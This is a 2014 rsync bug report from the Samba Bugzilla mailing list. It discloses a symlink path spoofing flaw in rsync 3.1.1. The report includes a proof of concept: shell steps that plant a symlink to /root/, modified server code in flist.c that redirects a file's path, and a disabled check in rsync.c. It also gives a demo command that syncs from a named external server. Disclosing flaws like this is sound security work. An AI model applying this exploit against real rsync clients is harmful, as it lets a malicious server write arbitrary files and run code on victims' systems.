[Bug 10977] New: Rsync path spoofing attack vulnerability (rsync 3.1.1 tested)
samba-bugs at samba.org
samba-bugs at samba.org
Mon Dec 1 00:04:35 MST 2014
https://bugzilla.samba.org/show_bug.cgi?id=10977
Bug ID: 10977
Summary: Rsync path spoofing attack vulnerability (rsync
3.1.1 tested)
Product: rsync
Version: 3.1.1
Hardware: All
OS: Linux
Status: NEW
Severity: critical
Priority: P5
Component: core
Assignee: wayned at samba.org
Reporter: gaojianfeng at baidu.com
QA Contact: rsync-qa at samba.org
Created attachment 10471
--> https://bugzilla.samba.org/attachment.cgi?id=10471&action=edit
Rsync path spoofing attack vulnerability (rsync 3.1.1 tested).pdf (Detailed
documentation)
Hi all
In newest version rsync(3.1.1),directly modify the file path into absolute
path is
not hijack succeed due to the security checks,but using symbolic links still
can bypass
security checks and spoofing client.When a client uses parameter -a to
synchronize
files of the server-side(default),for example:
rsync -avzP 127.0.0.1::share /tmp/share
Rsync recursive synchronous all files,An attacker can hijack the file path by
modifying
the code of the server-side,allows remote servers to write to arbitrary files,
and
consequently execute arbitrary code .
Vulnerability Details :
Firstly,i write a following file into the shared folder in rsync:a true
folder
and a symbolic link are directed to the root directory .
[root at pentest rsync]# ls -lh
total 8.0K
-rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt
lrwxrwxrwx 1 root root 6 Oct 31 05:09 fakedir -> /root/
drwxr-xr-x 2 root root 4.0K Oct 31 05:08 truedir
Then enter the truedir folder, create a new file name "pwned".
[root at pentest rsync]# cd truedir/
[root at pentest truedir]# ls
[root at pentest truedir]# echo rsync test > pwned
[root at pentest truedir]# ls -lh
total 4.0K
-rw-r--r-- 1 root root 11 Oct 31 05:17 pwned
[root at pentest truedir]#
Next I modify the server to send the file code,in the process of
synchronizing,the path
of file "pwned" can be blocked and changed into any path.For example as follow
code,change
true path (truedir) to symbolic link (fakedir),this would put the Pwned file
to download
to the symbolic link points to the address (fakedir -> /root/).
file: flist.c line:394
static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
const char *symlink_name, int symlink_len,
#endif
int ndx, int first_ndx)
{
if(strcmp(fname,"turedir/pwned") == 0){
fname="fakedir/pwned"; // symbolic link
//change file true path(truedir) to symbolic link (fakedir)
)
}
Then, verification occurs in the server-side and says "received request to
transfer
non-regular file fakedir/pwned.test 7 [sender]", But as an attacker, the code
of the
server-side can be arbitrarily controlled,Shielding the following code.
file:rsync.c line:405
/* if (iflags & ITEM_TRANSFER) {
int i = ndx - cur_flist->ndx_start;
if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
rprintf(FERROR,
"received request to transfer non-regular file: %d [%s]\n",
ndx, who_am_i());
exit_cleanup(RERR_PROTOCOL);
}
}
*/
Vulnerability Demo :
Online test:
rsync -avvzP 106.185.33.114::yaseng /tmp/yaseng
--
You are receiving this mail because:
You are the QA Contact for the bug.
More information about the rsync
mailing list